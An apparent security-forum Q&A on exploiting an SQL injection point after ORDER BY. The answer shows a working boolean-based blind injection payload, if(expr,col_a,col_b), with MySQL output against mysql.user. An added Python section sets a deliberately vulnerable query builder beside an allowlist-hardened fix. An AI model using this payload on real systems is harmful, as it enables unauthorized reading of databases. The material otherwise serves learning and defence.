Crafting a query for Blind SQL Injection
Problem description
I have found that one of my demo websites is vulnerable to SQL INJECTION (I'm currently doing CEH).
The injection point was found as follows:
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [*INJECTION POINT FOUND HERE*]
Now I need to craft something which could help me exploit this injection point that I have discovered. As far as I know UNION SELECT won't work after ORDER BY. However, I do think that blind SQL injection may work as illustrated below:
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [if 1=1 then 1,blank]
Now if 1 is posted at the injection point the query gives an error, whereas if it's kept blank the query will execute... THUS blind SQL injection will work.
Can someone please help me craft a query with IF THEN ELSE in SQL, as I don't know how to use IF THEN ELSE in SQL..
Tried injecting this but it's not working:
(IF (1=2) then 1 endif)
Full query:
SELECT column_1, column_2, column_3 from `table_1` WHERE `column_4` = '[*available injection point*]' order by id [*available injection point*] ASC limit [*available injection point*],[*available injection point*]
Recommended answer
If id is not unique in the result set and there is another column whose values are unique per id, you can do the following:
- Identify the order of the unique-per-id value with id, unique_per_id (it must be different from the order with id only; use desc on id if necessary).
- Boolean-based blind injection is then possible with id, IF(1=1,unique_per_id,id).
Example:
mysql> select host,user from mysql.user order by user;
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,host;
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=1,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=0,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
So whenever the result set's order with if(expr,host,user) is identical to the order with just host (second query), the condition expr was true.
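As an added example (not part of the original question or answer), this is what the fix looks like on the application side: the ORDER BY column and direction cannot be bound parameters, so the hardened builder maps them through an allowlist and binds only the WHERE and LIMIT values, shown beside the concatenating builder that has the shape of the question's full query. Table, column and sort-key names are assumptions matching the question's query, and the sample rows are constructed.

```python
import sqlite3

# Constructed sample rows standing in for the question's table_1 (assumption):
# tuples are (id, column_1, column_2, column_3, column_4).
SAMPLE_ROWS = [(1, "alpha", "x", "p", "3"), (2, "beta", "y", "q", "3"),
               (3, "gamma", "z", "r", "4")]

# Allowlists: the only sort keys and directions the application accepts, mapped
# to literal SQL. ORDER BY cannot take a bound parameter, so this lookup is what
# keeps an expression such as if(1=1,host,user) out of the query text.
ALLOWED_SORT_COLUMNS = {"id": "id", "col1": "column_1", "col2": "column_2"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def build_query_unsafe(column_4, sort_expr, direction, offset, count):
    """Vulnerable builder: every user-controlled value is concatenated, the
    shape of the full query in the question (four injection points)."""
    return (f"SELECT column_1, column_2, column_3 FROM table_1 "
            f"WHERE column_4 = '{column_4}' ORDER BY {sort_expr} {direction} "
            f"LIMIT {offset},{count}")

def build_query_safe(sort_key, direction, offset, count):
    """Hardened builder: WHERE and LIMIT values become bound parameters; the
    ORDER BY column and direction are looked up in the allowlists."""
    if sort_key not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_key!r}")
    if direction.lower() not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    if not all(isinstance(n, int) and n >= 0 for n in (offset, count)):
        raise ValueError("offset and count must be non-negative integers")
    return (f"SELECT column_1, column_2, column_3 FROM table_1 "
            f"WHERE column_4 = ? ORDER BY {ALLOWED_SORT_COLUMNS[sort_key]} "
            f"{ALLOWED_DIRECTIONS[direction.lower()]} LIMIT ? OFFSET ?")

def sort_key_accepted(sort_key, direction="asc"):
    """True if the hardened builder accepts this sort key and direction."""
    try:
        build_query_safe(sort_key, direction, 0, 10)
        return True
    except ValueError:
        return False

def run_safe(column_4, sort_key, direction="asc", offset=0, count=10):
    """Run the hardened query against an in-memory SQLite copy of SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table_1 (id INTEGER, column_1, column_2, column_3, column_4)")
    conn.executemany("INSERT INTO table_1 VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    sql = build_query_safe(sort_key, direction, offset, count)
    return conn.execute(sql, (column_4, count, offset)).fetchall()
```

The same allowlist idea applies to any other sortable field you expose; the point is that the request carries a key into a fixed mapping, never SQL text.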